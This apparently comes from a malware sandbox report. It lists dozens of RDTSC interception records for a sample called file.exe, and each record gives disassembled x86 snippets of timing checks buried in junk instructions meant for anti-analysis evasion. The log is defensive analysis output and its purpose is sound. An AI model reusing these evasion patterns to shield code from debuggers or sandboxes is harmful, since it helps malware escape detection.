              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11651EA second address: 11651F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1165819 second address: 1165837 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB8DCE2029Ah 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e xchg eax, ebx 0x0000000f jbe 00007FB8DCE202A4h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11663D8 second address: 11663DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11674CC second address: 11674D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11674D9 second address: 11674DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168A1F second address: 1168A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 push 00000000h 0x00000008 call 00007FB8DCE202A6h 0x0000000d stc 0x0000000e pop esi 0x0000000f push 00000000h 0x00000011 adc di, 07CCh 0x00000016 movsx esi, dx 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168A50 second address: 1168A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168A54 second address: 1168A58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168A58 second address: 1168A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1169480 second address: 1169484 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116923F second address: 1169243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116AA6C second address: 116AA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007FB8DCE20296h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116F6CD second address: 116F6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11722DB second address: 11722DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11722DF second address: 1172302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCDE9E47h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1173F4A second address: 1173F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FB8DCE20296h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1175300 second address: 117531B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCDE9E47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11746A6 second address: 11746AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117726A second address: 1177274 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FB8DCDE9E36h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176496 second address: 117649A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11792A8 second address: 11792AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117857C second address: 1178582 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11792AC second address: 117931A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB8DCDE9E38h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FB8DCDE9E48h 0x00000010 nop 0x00000011 mov edi, dword ptr [ebp+122D359Eh] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FB8DCDE9E38h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov dword ptr [ebp+12486023h], ecx 0x00000039 push 00000000h 0x0000003b and edi, 058A6F38h 0x00000041 xchg eax, esi 0x00000042 push edi 0x00000043 push esi 0x00000044 push esi 0x00000045 pop esi 0x00000046 pop esi 0x00000047 pop edi 0x00000048 push eax 0x00000049 push esi 0x0000004a push eax 0x0000004b push edx 0x0000004c jp 00007FB8DCDE9E36h 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1178582 second address: 117861D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB8DCE2029Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FB8DCE20298h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov di, 62F5h 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 jmp 00007FB8DCE202A2h 0x0000003c mov eax, dword ptr [ebp+122D0391h] 0x00000042 mov dword ptr [ebp+12469C1Fh], ecx 0x00000048 push FFFFFFFFh 0x0000004a ja 00007FB8DCE202A1h 0x00000050 nop 0x00000051 jmp 00007FB8DCE2029Bh 0x00000056 push eax 0x00000057 jc 00007FB8DCE202B2h 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FB8DCE202A4h 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117945E second address: 1179467 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117A61A second address: 117A620 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11824AE second address: 11824BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8DCDE9E3Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11825F1 second address: 11825FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FB8DCE20296h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1183637 second address: 11836DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB8DCDE9E48h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FB8DCDE9E38h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 and ebx, 54267E7Eh 0x0000002e mov dword ptr [ebp+122D3642h], ecx 0x00000034 push dword ptr fs:[00000000h] 0x0000003b mov di, 85BFh 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 mov edi, dword ptr [ebp+122D1819h] 0x0000004c mov eax, dword ptr [ebp+122D0BB5h] 0x00000052 push 00000000h 0x00000054 push ebx 0x00000055 call 00007FB8DCDE9E38h 0x0000005a pop ebx 0x0000005b mov dword ptr [esp+04h], ebx 0x0000005f add dword ptr [esp+04h], 00000016h 0x00000067 inc ebx 0x00000068 push ebx 0x00000069 ret 0x0000006a pop ebx 0x0000006b ret 0x0000006c push ebx 0x0000006d mov edi, ecx 0x0000006f pop ebx 0x00000070 mov ebx, dword ptr [ebp+122D2A36h] 0x00000076 push FFFFFFFFh 0x00000078 xor dword ptr [ebp+122D17EEh], esi 0x0000007e nop 0x0000007f push eax 0x00000080 push edx 0x00000081 push edi 0x00000082 push eax 0x00000083 push edx 0x00000084 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11825FB second address: 11825FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11836DC second address: 11836E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11825FF second address: 118261A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB8DCE2029Fh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118261A second address: 1182687 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 sbb di, C2B0h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov edi, dword ptr [ebp+122D2A3Ch] 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 mov eax, dword ptr [ebp+122D0299h] 0x00000027 mov ebx, 3F7A202Ch 0x0000002c push FFFFFFFFh 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007FB8DCDE9E38h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 push eax 0x00000049 pushad 0x0000004a pushad 0x0000004b jmp 00007FB8DCDE9E45h 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192DAB second address: 1192DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FB8DCE20296h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192DBD second address: 1192DC3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192DC3 second address: 1192DC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192DC8 second address: 1192DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192DCE second address: 1192DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192E42 second address: 1192E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192E46 second address: 1192E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192E54 second address: 1192E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007FB8DCDE9E3Dh 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 pushad 0x00000019 jo 00007FB8DCDE9E36h 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FB8DCDE9E47h 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192E97 second address: 1192EB2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 pushad 0x00000013 jc 00007FB8DCE20296h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11986A6 second address: 11986B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11986B2 second address: 11986E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 jmp 00007FB8DCE202A3h 0x0000000e jmp 00007FB8DCE2029Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007FB8DCE20296h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11986E4 second address: 11986E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119829E second address: 11982B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCE202A1h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11983FF second address: 1198409 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB8DCDE9E3Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119B759 second address: 119B763 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116D157 second address: 116D15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116D15C second address: 116D179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FB8DCE20296h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FB8DCE2029Ch 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116D179 second address: 116D188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8DCDE9E3Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116D7C6 second address: 116D7CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116D7CA second address: 116D801 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB8DCDE9E42h 0x00000008 jmp 00007FB8DCDE9E45h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pop edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116D801 second address: 116D807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116D807 second address: 116D83F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCDE9E3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push esi 0x0000000f jmp 00007FB8DCDE9E41h 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB8DCDE9E3Ch 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E063 second address: 116E0B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE2029Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b xor dx, 9402h 0x00000010 mov edi, dword ptr [ebp+122D1ACAh] 0x00000016 push 0000001Eh 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FB8DCE20298h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 mov edi, dword ptr [ebp+12469C1Fh] 0x00000038 nop 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E3AF second address: 116E3B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E3B5 second address: 116E3B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E3B9 second address: 116E3E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b jmp 00007FB8DCDE9E46h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB8DCDE9E3Ah 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E3E7 second address: 116E402 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE2029Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E402 second address: 116E407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E407 second address: 116E40D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E40D second address: 116E411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E411 second address: 116E421 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E535 second address: 116E53A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E53A second address: 116E557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCE2029Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E557 second address: 116E56D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8DCDE9E42h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116E56D second address: 114CE1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dx, cx 0x0000000c lea eax, dword ptr [ebp+12490F26h] 0x00000012 push eax 0x00000013 push eax 0x00000014 jmp 00007FB8DCE202A5h 0x00000019 pop eax 0x0000001a mov dword ptr [esp], eax 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007FB8DCE20298h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 mov ecx, dword ptr [ebp+122D1C71h] 0x0000003d je 00007FB8DCE2029Ch 0x00000043 xor edx, dword ptr [ebp+122D37C1h] 0x00000049 call dword ptr [ebp+122D3106h] 0x0000004f push eax 0x00000050 push edx 0x00000051 jnp 00007FB8DCE202AAh 0x00000057 jmp 00007FB8DCE202A4h 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A34AD second address: 11A34BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCDE9E3Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A34BD second address: 11A34C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FB8DCE20296h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A34C7 second address: 11A34CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A37A4 second address: 11A37AA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A37AA second address: 11A37B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A37B4 second address: 11A37B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A37B8 second address: 11A37BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A3A51 second address: 11A3A56 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A3D0B second address: 11A3D32 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB8DCDE9E36h 0x00000008 jmp 00007FB8DCDE9E3Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007FB8DCDE9E36h 0x00000017 jl 00007FB8DCDE9E36h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A98B6 second address: 11A98D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB8DCE202A8h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A853C second address: 11A8552 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB8DCDE9E40h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8974 second address: 11A8978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8AF5 second address: 11A8B0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB8DCDE9E40h 0x0000000f rdtsc
